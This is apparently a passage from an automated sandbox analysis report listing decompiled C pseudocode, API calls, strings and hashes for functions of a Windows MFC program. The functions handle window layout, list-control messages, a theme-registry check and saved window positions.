				_t56 = SendMessageA( *( *((intOrPtr*)(_t77 - 0x10)) + 0x20), 0x1006, 0, _t77 - 0x60);
				 *(_t77 - 4) = 1;
				L00425DFC();
				 *(_t77 - 4) = 0;
				L00425DFC();
				 *(_t77 - 4) =  *(_t77 - 4) | 0xffffffff;
				L00425DFC();
				 *[fs:0x0] =  *((intOrPtr*)(_t77 - 0xc));
				return _t56;
			}

0x0040a3ad
0x0040a3b7
0x0040a3ba
0x0040a3bf
0x0040a3c6
0x0040a3c7
0x0040a3c8
0x0040a3c9
0x0040a3ca
0x0040a3cd
0x0040a3d0
0x0040a3d1
0x0040a3d2
0x0040a3d7
0x0040a3da
0x0040a3dd
0x0040a3e0
0x0040a3e7
0x0040a3ed
0x0040a3f2
0x0040a3f7
0x0040a3fa
0x0040a405
0x0040a408
0x0040a40e
0x0040a41c
0x0040a410
0x0040a410
0x0040a410
0x0040a433
0x0040a435
0x0040a438
0x0040a43f
0x0040a442
0x0040a449
0x0040a44f
0x0040a454
0x0040a459
0x0040a45c
0x0040a467
0x0040a46e
0x0040a47d
0x0040a482
0x0040a486
0x0040a48e
0x0040a491
0x0040a496
0x0040a49d
0x0040a4a8
0x0040a4b0

APIs

_EH_prolog.MSVCRT ref: 0040A3AD
#3998.MFC42(00000003,00000000,?,00000000,00000000,00000000,00000000), ref: 0040A3D2
#2915.MFC42(?,00000003,00000000,?,00000000,00000000,00000000,00000000), ref: 0040A3ED
#5572.MFC42(000000FF,?,00000003,00000000,?,00000000,00000000,00000000,00000000), ref: 0040A3FA
SendMessageA.USER32 ref: 0040A433
#2915.MFC42(?), ref: 0040A44F
#5572.MFC42(000000FF,?), ref: 0040A45C
SendMessageA.USER32 ref: 0040A47D
#800.MFC42 ref: 0040A486
#800.MFC42 ref: 0040A491
#800.MFC42 ref: 0040A49D

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #800$#2915#5572MessageSend$#3998H_prolog
String ID:
API String ID: 1290623193-0
Opcode ID: 1e75e306e6019fd73cf2c9f843c41089491d0a7e5103226113d5709c14a4cacc
Instruction ID: 82a60d56836ec415c76865ec3033eabb7d4afed03cd2d673c09b728c5e8a3230
Opcode Fuzzy Hash: 1e75e306e6019fd73cf2c9f843c41089491d0a7e5103226113d5709c14a4cacc
Instruction Fuzzy Hash: 70315DB090021CAFCB00DF95D989ADEBBB8FF04328F50415AF811A72A1D7B49E15DF54

Uniqueness

Uniqueness Score: -1.00%

Function 00409180, Relevance: 16.6, APIs: 11, Instructions: 87
windowCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E00409180(intOrPtr __ecx) {
				intOrPtr _t44;
				intOrPtr _t47;
				intOrPtr _t51;
				long _t56;
				void* _t70;
				intOrPtr _t74;
				void* _t77;

				L004269E6();
				_t74 = __ecx;
				 *((intOrPtr*)(_t77 - 0x10)) = __ecx;
				 *(_t77 - 4) = 2;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push( *((intOrPtr*)(_t77 + 8)));
				_push(0);
				_t70 = 3;
				_push(_t70);
				L00426072();
				_t44 =  *((intOrPtr*)(_t77 + 0xc));
				 *(_t77 - 0x38) = _t70;
				 *((intOrPtr*)(_t77 - 0x34)) = 0;
				 *((intOrPtr*)(_t77 - 0x30)) = 1;
				_push( *((intOrPtr*)(_t44 - 8)));
				L0042601E();
				_push(0xffffffff);
				 *((intOrPtr*)(_t77 - 0x24)) = _t44;
				L00426018();
				 *((intOrPtr*)(_t77 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)(_t77 + 0xc)) - 8));
				_t47 =  *((intOrPtr*)(_t77 + 0x10));
				if(_t47 != 0xffffffff) {
					 *(_t77 - 0x1c) = _t47 + 3;
				} else {
					 *(_t77 - 0x1c) = 2;
				}
				SendMessageA( *(_t74 + 0x20), 0x1006, 0, _t77 - 0x38);
				_t51 =  *((intOrPtr*)(_t77 + 0x14));
				 *(_t77 - 0x60) = 3;
				 *((intOrPtr*)(_t77 - 0x5c)) = 0;
				 *(_t77 - 0x58) = 2;
				_push( *((intOrPtr*)(_t51 - 8)));
				L0042601E();
				_push(0xffffffff);
				 *((intOrPtr*)(_t77 - 0x4c)) = _t51;
				L00426018();
				 *((intOrPtr*)(_t77 - 0x44)) = 1;
				 *((intOrPtr*)(_t77 - 0x48)) =  *((intOrPtr*)( *((intOrPtr*)(_t77 + 0x14)) - 8));
				_t56 = SendMessageA( *( *((intOrPtr*)(_t77 - 0x10)) + 0x20), 0x1006, 0, _t77 - 0x60);
				 *(_t77 - 4) = 1;
				L00425DFC();
				 *(_t77 - 4) = 0;
				L00425DFC();
				 *(_t77 - 4) =  *(_t77 - 4) | 0xffffffff;
				L00425DFC();
				 *[fs:0x0] =  *((intOrPtr*)(_t77 - 0xc));
				return _t56;
			}

0x00409185
0x0040918f
0x00409192
0x00409197
0x0040919e
0x0040919f
0x004091a0
0x004091a1
0x004091a2
0x004091a5
0x004091a8
0x004091a9
0x004091aa
0x004091af
0x004091b2
0x004091b5
0x004091b8
0x004091bf
0x004091c5
0x004091ca
0x004091cf
0x004091d2
0x004091dd
0x004091e0
0x004091e6
0x004091f4
0x004091e8
0x004091e8
0x004091e8
0x0040920b
0x0040920d
0x00409210
0x00409217
0x0040921a
0x00409221
0x00409227
0x0040922c
0x00409231
0x00409234
0x0040923f
0x00409246
0x00409255
0x0040925a
0x0040925e
0x00409266
0x00409269
0x0040926e
0x00409275
0x00409280
0x00409288

APIs

_EH_prolog.MSVCRT ref: 00409185
#3998.MFC42(00000003,00000000,?,00000000,00000000,00000000,00000000), ref: 004091AA
#2915.MFC42(?,00000003,00000000,?,00000000,00000000,00000000,00000000), ref: 004091C5
#5572.MFC42(000000FF,?,00000003,00000000,?,00000000,00000000,00000000,00000000), ref: 004091D2
SendMessageA.USER32 ref: 0040920B
#2915.MFC42(?), ref: 00409227
#5572.MFC42(000000FF,?), ref: 00409234
SendMessageA.USER32 ref: 00409255
#800.MFC42 ref: 0040925E
#800.MFC42 ref: 00409269
#800.MFC42 ref: 00409275

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #800$#2915#5572MessageSend$#3998H_prolog
String ID:
API String ID: 1290623193-0
Opcode ID: 2c9b6ea4ca1387c8e61ed7c7ac9a04c72d0623f9ebb02f34ca7605296d241a81
Instruction ID: 908d7d1158ec3114bcfa012924ea44d9702cf4be20c280d710239196cf52f9af
Opcode Fuzzy Hash: 2c9b6ea4ca1387c8e61ed7c7ac9a04c72d0623f9ebb02f34ca7605296d241a81
Instruction Fuzzy Hash: CE315BB090021CAFDB00DF95D989ADEBBB8FF08328F50415AF825A72A1D7B49E04DF54

Uniqueness

Uniqueness Score: -1.00%

Function 00401B40, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 183
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E00401B40(intOrPtr* __ecx, void* __edx) {
				intOrPtr _t78;
				intOrPtr* _t79;
				intOrPtr* _t95;
				signed int _t100;
				signed int _t101;
				intOrPtr _t103;
				void* _t105;
				void* _t107;
				intOrPtr* _t108;
				intOrPtr _t112;
				intOrPtr* _t113;
				intOrPtr* _t116;
				void* _t128;
				intOrPtr* _t129;
				void* _t131;
				intOrPtr* _t138;
				void* _t139;
				intOrPtr* _t141;
				intOrPtr _t144;
				intOrPtr _t145;
				intOrPtr _t148;
				void* _t153;
				intOrPtr _t157;
				void* _t158;

				_t139 = __edx;
				L004269E6();
				_t116 = __ecx;
				_push(SetCapture( *(__ecx + 0x20)));
				L00426372();
				if( *((intOrPtr*)(_t116 + 0xe0)) == 0) {
					RedrawWindow( *(_t116 + 0x20), 0, 0, 0x180);
				}
				_t78 =  *((intOrPtr*)(_t116 + 0xe4));
				if(_t78 == 0xe81b || _t78 == 0xe81e) {
					 *((intOrPtr*)(_t158 - 0x10)) = 1;
					_t79 = _t116 + 0x84;
				} else {
					 *((intOrPtr*)(_t158 - 0x10)) = 0;
					_t79 = _t116 + 0x8c;
				}
				 *((intOrPtr*)(_t116 + 0xc4)) =  *_t79;
				 *((intOrPtr*)(_t116 + 0xc8)) =  *((intOrPtr*)(_t79 + 4));
				GetWindowRect( *(_t116 + 0x20), _t158 - 0x20);
				_push(_t158 - 0x30);
				_push( *(_t158 + 8));
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L004018AC(_t116);
				 *((intOrPtr*)(_t116 + 0xd4)) = 1;
				asm("cdq");
				asm("cdq");
				 *(_t116 + 0xcc) =  *((intOrPtr*)(_t158 - 0x30)) +  *((intOrPtr*)(_t158 - 0x28)) -  *((intOrPtr*)(_t158 - 0x28)) >> 1;
				 *(_t116 + 0xd0) =  *((intOrPtr*)(_t158 - 0x24)) +  *((intOrPtr*)(_t158 - 0x2c)) - _t139 >> 1;
				 *(_t116 + 0x80) =  *(_t158 + 8);
				L0042650A();
				 *((intOrPtr*)(_t158 - 0x44)) = 0x42e334;
				_t26 = _t158 - 0x44; // 0x42e334
				_t153 = 0;
				 *(_t158 - 4) = 0;
				L00401E2E(_t116, _t26);
				_t95 = _t116 + 0x9c;
				if( *((intOrPtr*)(_t158 - 0x10)) == 0) {
					_t95 = _t116 + 0xa4;
				}
				_t148 =  *((intOrPtr*)(_t158 - 0x3c));
				 *((intOrPtr*)(_t116 + 0xb4)) =  *_t95;
				 *((intOrPtr*)(_t116 + 0xb8)) =  *((intOrPtr*)(_t95 + 4));
				if(_t148 > _t153) {
					_t138 =  *((intOrPtr*)(_t158 - 0x40));
					do {
						if( *((intOrPtr*)(_t158 - 0x10)) == _t153) {
							_t112 =  *((intOrPtr*)(_t116 + 0xb4));
							_t144 =  *((intOrPtr*)( *_t138 + 0xa4));
							if(_t112 <= _t144) {
								_t112 = _t144;
							}
							 *((intOrPtr*)(_t116 + 0xb4)) = _t112;
						} else {
							_t145 =  *((intOrPtr*)(_t116 + 0xb8));
							_t113 = _t116 + 0xb8;
							_t157 =  *((intOrPtr*)( *_t138 + 0xa0));
							if(_t145 <= _t157) {
								_t145 = _t157;
							}
							 *_t113 = _t145;
							_t153 = 0;
						}
						_t138 = _t138 + 4;
						_t148 = _t148 - 1;
					} while (_t148 != 0);
				}
				 *((intOrPtr*)(_t116 + 0xbc)) =  *((intOrPtr*)(_t116 + 0xc4));
				 *((intOrPtr*)(_t116 + 0xc0)) =  *((intOrPtr*)(_t116 + 0xc8));
				if(L004020FE(_t116) != 0) {
					_t141 =  *((intOrPtr*)(_t158 - 0x40));
					_t128 = 0;
					if( *((intOrPtr*)(_t158 - 0x3c)) > _t153) {
						_t108 = _t141;
						while( *_t108 != _t116) {
							_t128 = _t128 + 1;
							_t108 = _t108 + 4;
							if(_t128 <  *((intOrPtr*)(_t158 - 0x3c))) {
								continue;
							}
							goto L25;
						}
					}
					L25:
					_t100 =  *(_t116 + 0x80);
					if(_t100 == 0xc || _t100 == 0xa) {
						_t101 = _t100 | 0xffffffff;
					} else {
						_t101 = 1;
					}
					_t103 =  *((intOrPtr*)(_t141 + (_t101 + _t128) * 4));
					_t129 = _t103 + 0x84;
					if( *((intOrPtr*)(_t158 - 0x10)) == _t153) {
						_t129 = _t103 + 0x8c;
					}
					_t105 =  *((intOrPtr*)(_t129 + 4)) -  *((intOrPtr*)(_t103 + 0xa8));
					_t131 =  *_t129 -  *((intOrPtr*)(_t103 + 0x9c));
				} else {
					_push(1);
					_push(_t153);
					_push(_t158 - 0x20);
					_push(1);
					_push(0xe900);
					_push(0xffff);
					_push(_t153);
					L0042656A();
					_t105 =  *((intOrPtr*)(_t158 - 0x14)) -  *((intOrPtr*)(_t158 - 0x1c)) + 0xfffffffc;
					_t131 =  *((intOrPtr*)(_t158 - 0x18)) -  *(_t158 - 0x20) + 0xfffffffc;
				}
				 *((intOrPtr*)(_t116 + 0xbc)) =  *((intOrPtr*)(_t116 + 0xbc)) + _t131;
				 *((intOrPtr*)(_t116 + 0xc0)) =  *((intOrPtr*)(_t116 + 0xc0)) + _t105;
				_t107 =  *((intOrPtr*)( *_t116 + 0x104))();
				 *(_t158 - 4) =  *(_t158 - 4) | 0xffffffff;
				L00426504();
				 *[fs:0x0] =  *((intOrPtr*)(_t158 - 0xc));
				return _t107;
			}

0x00401b40
0x004107f9
0x00410803
0x0041080f
0x00410810
0x0041081d
0x00410829
0x00410829
0x0041082f
0x0041083a
0x00410937
0x0041093e
0x0041084b
0x0041084b
0x0041084e
0x0041084e
0x00410859
0x0041085f
0x0041086c
0x00410878
0x0041087b
0x00410883
0x00410884
0x00410885
0x00410886
0x00410887
0x00410894
0x0041089e
0x004108ab
0x004108b2
0x004108bb
0x004108c4
0x004108ca
0x004108cf
0x004108d6
0x004108d9
0x004108de
0x004108e1
0x004108e9
0x004108ef
0x004108f1
0x004108f1
0x004108f9
0x004108ff
0x00410907
0x0041090d
0x0041090f
0x00410912
0x00410915
0x0041094b
0x00410951
0x00410959
0x0041095b
0x0041095b
0x0041095d
0x00410917
0x00410919
0x0041091f
0x00410925
0x0041092d
0x0041092f
0x0041092f
0x00410931
0x00410933
0x00410933
0x00410963
0x00410966
0x00410966
0x00410912
0x00410971
0x0041097d
0x0041098a
0x004109bc
0x004109bf
0x004109c4
0x004109c6
0x004109c8
0x004109cc
0x004109cd
0x004109d3
0x00000000
0x00000000
0x00000000
0x004109d3
0x004109c8
0x004109d5
0x004109d5
0x004109de
0x004109ea
0x004109e5
0x004109e7
0x004109e7
0x004109f2
0x004109f5
0x004109fb
0x004109fd
0x004109fd
0x00410a14
0x00410a16
0x0041098c
0x0041098f
0x00410994
0x00410995
0x00410996
0x00410998
0x0041099d
0x004109a2
0x004109a3
0x004109b4
0x004109b7
0x004109b7
0x00410a18
0x00410a1e
0x00410a28
0x00410a2e
0x00410a35
0x00410a3f
0x00410a48

APIs

_EH_prolog.MSVCRT ref: 004107F9
SetCapture.USER32(?), ref: 00410809
#2864.MFC42(00000000), ref: 00410810
RedrawWindow.USER32(?,00000000,00000000,00000180,00000000), ref: 00410829
GetWindowRect.USER32 ref: 0041086C
#500.MFC42 ref: 004108CA
#5655.MFC42(00000000,0000FFFF,0000E900,00000001,?,00000000,00000001,4B), ref: 004109A3
#772.MFC42 ref: 00410A35

Strings

4B, xrefs: 004108D6, 004108DB

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$#2864#500#5655#772CaptureH_prologRectRedraw
String ID: 4B
API String ID: 578149795-455405905
Opcode ID: 68f0781bbb7e21d46654a97c62cb47687ea66573dea3e7acf2b370483f6ee268
Instruction ID: 2e6caa9902f81655ac96998d4ee1d9b7c8cb3623dfdd0fdb1ccbdef22d54b9cc
Opcode Fuzzy Hash: 68f0781bbb7e21d46654a97c62cb47687ea66573dea3e7acf2b370483f6ee268
Instruction Fuzzy Hash: 4C715871A00214CFDB04CF68C895BEA77B5FF48310F1881BAE809AB396D774A985CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00418DF2, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 73
stringregistryCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E00418DF2() {
				void* _v8;
				int _v12;
				int _v16;
				char _v40;
				char _v312;
				int _t37;
				signed int _t39;
				int _t46;
				void* _t51;

				if( *0x4421f4 == 0) {
					_t37 = 1;
					 *0x4421f4 = _t37;
					if(RegOpenKeyExA(0x80000001, "Software\\Microsoft\\Plus!\\Themes\\Current", 0, 0x20019,  &_v8) == 0) {
						_v16 = 0x104;
						_v12 = _t37;
						if(RegQueryValueExA(_v8, 0, 0,  &_v12,  &_v312,  &_v16) == 0) {
							_t39 = 5;
							memcpy( &_v40, "Windows Classic.theme", _t39 << 2);
							asm("movsw");
							_t46 = lstrlenA( &_v312);
							if(_t46 >= lstrlenA( &_v40) && lstrcmpiA(_t51 + _t46 - lstrlenA( &_v40) - 0x134,  &_v40) == 0) {
								 *0x4421f0 = _t37;
							}
						}
						RegCloseKey(_v8);
					}
					return  *0x4421f0;
				}
				return  *0x4421f0;
			}

0x00418e04
0x00418e13
0x00418e28
0x00418e36
0x00418e4e
0x00418e58
0x00418e63
0x00418e6c
0x00418e70
0x00418e72
0x00418e83
0x00418e8d
0x00418ead
0x00418ead
0x00418e8d
0x00418eb6
0x00418ebc
0x00000000
0x00418ec2
0x00000000

APIs

RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\Plus!\Themes\Current,00000000,00020019,?), ref: 00418E2E
RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 00418E5B
lstrlenA.KERNEL32(?), ref: 00418E81
lstrlenA.KERNEL32(?), ref: 00418E89
lstrlenA.KERNEL32(?,?), ref: 00418E97
lstrcmpiA.KERNEL32(?), ref: 00418EA3
RegCloseKey.ADVAPI32(?), ref: 00418EB6

Strings

Windows Classic.theme, xrefs: 00418E67
Software\Microsoft\Plus!\Themes\Current, xrefs: 00418E1E

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrlen$CloseOpenQueryValuelstrcmpi
String ID: Software\Microsoft\Plus!\Themes\Current$Windows Classic.theme
API String ID: 4275378203-3051618167
Opcode ID: 8f58abbd19b03237b1392a039221e4b960227b54ce10f2222ce93e1ed322e33c
Instruction ID: ca5442a3cd185a1c438f41b318108b2fed6c0ec2b84c4e7c5726e89e64270528
Opcode Fuzzy Hash: 8f58abbd19b03237b1392a039221e4b960227b54ce10f2222ce93e1ed322e33c
Instruction Fuzzy Hash: BF212976D00219ABDB11DBA1DE44ECBBBBCBB45344F1100B7F601E7110EBB5AA44CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040CA73, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 47%

			E0040CA73(void* __ecx) {
				char _v8;
				char _v12;
				struct HWND__* _t7;

				_push( &_v12);
				_t2 =  &_v8; // 0x50402834
				_t7 = _t2;
				_push(_t7);
				_push("WindowPos");
				_push("Settings");
				L0042637E();
				if(_t7 == 0) {
					_t7 = GetDesktopWindow();
					_push(_t7);
					L00426372();
					_push(_t7);
					L0042636C();
				} else {
					_t4 =  &_v8; // 0x50402834
					_push( *_t4);
					L00426378();
					_push(_v8);
					L00425DF0();
				}
				return _t7;
			}

0x0040ca7c
0x0040ca7d
0x0040ca7d
0x0040ca82
0x0040ca83
0x0040ca88
0x0040ca93
0x0040ca9a
0x0040cab1
0x0040cab7
0x0040cab8
0x0040cabd
0x0040cac0
0x0040ca9c
0x0040ca9c
0x0040ca9c
0x0040caa1
0x0040caa6
0x0040caa9
0x0040caae
0x0040cac7

APIs

#3520.MFC42(Settings,WindowPos,?,?), ref: 0040CA93
#6195.MFC42(?,Settings,WindowPos,?,?), ref: 0040CAA1
#825.MFC42(?,?,Settings,WindowPos,?,?), ref: 0040CAA9
GetDesktopWindow.USER32 ref: 0040CAB1
#2864.MFC42(00000000), ref: 0040CAB8
#1768.MFC42(00000000,00000000), ref: 0040CAC0

Strings

WindowPos, xrefs: 0040CA83
4(@P, xrefs: 0040CA7D, 0040CA9C, 0040CA82
Settings, xrefs: 0040CA88

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #1768#2864#3520#6195#825DesktopWindow
String ID: 4(@P$Settings$WindowPos
API String ID: 662697341-1075237977
Opcode ID: c3ec2497f2071c7152517bc42787a6e1f2951ce70572f1d32cde9a74a81801ce
Instruction ID: 6cdbd4d6d4a46a81ddecbd6dd3a4791d84f0ff3302ab6dda61f054e73a35290e
Opcode Fuzzy Hash: c3ec2497f2071c7152517bc42787a6e1f2951ce70572f1d32cde9a74a81801ce
Instruction Fuzzy Hash: 26E06571740528FBDB05F7A1EC46DEF76AD9B40704B91016FF902A2191DE786E009AAD

Uniqueness

Uniqueness Score: -1.00%

Function 0041EAA4, Relevance: 15.1, APIs: 10, Instructions: 139
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E0041EAA4(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8) {
				char _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				void* __ebp;
				void* _t43;
				void* _t44;
				signed int _t51;
				intOrPtr _t52;
				struct tagRECT* _t71;
				intOrPtr _t82;
				signed int _t85;
				intOrPtr _t92;
				void* _t109;
				intOrPtr* _t110;
				void* _t111;

				_t109 = __edx;
				_t110 = _a4;
				_t111 = __ecx;
				if(_t110 != 0) {
					_t82 = _a8;
					if(_t82 != 0) {
						_t44 = GetCurrentObject( *(_t110 + 8), 6);
						L00426528();
						 *(__ecx + 0xc) = _t44;
						 *((intOrPtr*)( *_t110 + 0x3c))(8, _t44);
						 *((intOrPtr*)( *_t110 + 0x50))( &_v12, 1, 1);
						 *((intOrPtr*)( *_t110 + 0x48))( &_v12,  *((intOrPtr*)(__ecx + 0x40)),  *((intOrPtr*)(__ecx + 0x44)));
						_t51 =  *(__ecx + 0x34);
						_t85 = ( *((intOrPtr*)(_t82 + 0x14)) - 1) * _t51;
						_t92 = _t51 + _t85;
						_t52 =  *((intOrPtr*)(__ecx + 0x38));
						_a4 = _t92;
						if(_t92 > _t52) {
							_a4 = _t52;
						}
						L004266B4();
						L0040123F(_t111, _t110);
						L0040189D(_t111);
						L004266B4();
						L00401F96(_t111, _t110);
						 *((intOrPtr*)( *_t110 + 0x30))(_t111 + 0x18, _a8,  &_v12,  ~( *(_t111 + 0x20)),  ~( *(_t111 + 0x30)) << 1, _t110, _a8, _a8,  &_v12,  ~( *(_t111 + 0x20)), 0);
						 *((intOrPtr*)( *_t110 + 0x38))(0);
						 *((intOrPtr*)( *_t110 + 0x34))(0xffffff);
						_t71 =  &_v28;
						_push(0);
						_push(_t71);
						_push(_t85);
						L00426114();
						L00425FCA();
						GetClientRect( *(_t71 + 0x20),  &_v44);
						OffsetRect( &_v28, 0, _v44.top - _v44.bottom);
						_push(_v28.top);
						_push(_v28.left);
						_push( &_v12);
						L00426882();
						while(_t85 < _a4) {
							_push(_t85);
							_push(_t110);
							L004019DD(_t111, _t109);
							_t85 = _t85 + 1;
						}
						L004266B4();
						return  *((intOrPtr*)( *_t110 + 0x30))( *((intOrPtr*)(_t111 + 0xc)),  &_v12, 0, 0);
					}
				}
				return _t43;
			}

0x0041eaa4
0x0041eaad
0x0041eab2
0x0041eab4
0x0041eaba
0x0041eabf
0x0041eaca
0x0041ead1
0x0041ead6
0x0041eadf
0x0041eaee
0x0041eaff
0x0041eb05
0x0041eb09
0x0041eb0c
0x0041eb0f
0x0041eb14
0x0041eb17
0x0041eb19
0x0041eb19
0x0041eb2a
0x0041eb35
0x0041eb40
0x0041eb59
0x0041eb64
0x0041eb71
0x0041eb7a
0x0041eb86
0x0041eb8b
0x0041eb8e
0x0041eb90
0x0041eb91
0x0041eb92
0x0041eb99
0x0041eba5
0x0041ebb8
0x0041ebbe
0x0041ebc6
0x0041ebc9
0x0041ebca
0x0041ebcf
0x0041ebd4
0x0041ebd5
0x0041ebd8
0x0041ebdd
0x0041ebdd
0x0041ebea
0x00000000
0x0041ebf6
0x0041eabf
0x0041ebfd

APIs

GetCurrentObject.GDI32(?,00000006), ref: 0041EACA
#2860.MFC42(00000000), ref: 0041EAD1
#6194.MFC42(?,?,00000000), ref: 0041EB2A
#6194.MFC42(?,?,?,?,?,?,?,?,?,00000000), ref: 0041EB59
#3293.MFC42(?,?,00000000), ref: 0041EB92
#6696.MFC42(?,?,00000000), ref: 0041EB99
GetClientRect.USER32 ref: 0041EBA5
OffsetRect.USER32(?,00000000,?), ref: 0041EBB8
#4333.MFC42(?,?,?), ref: 0041EBCA
#6194.MFC42(?,00000000,00000000,?,?,?), ref: 0041EBEA

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
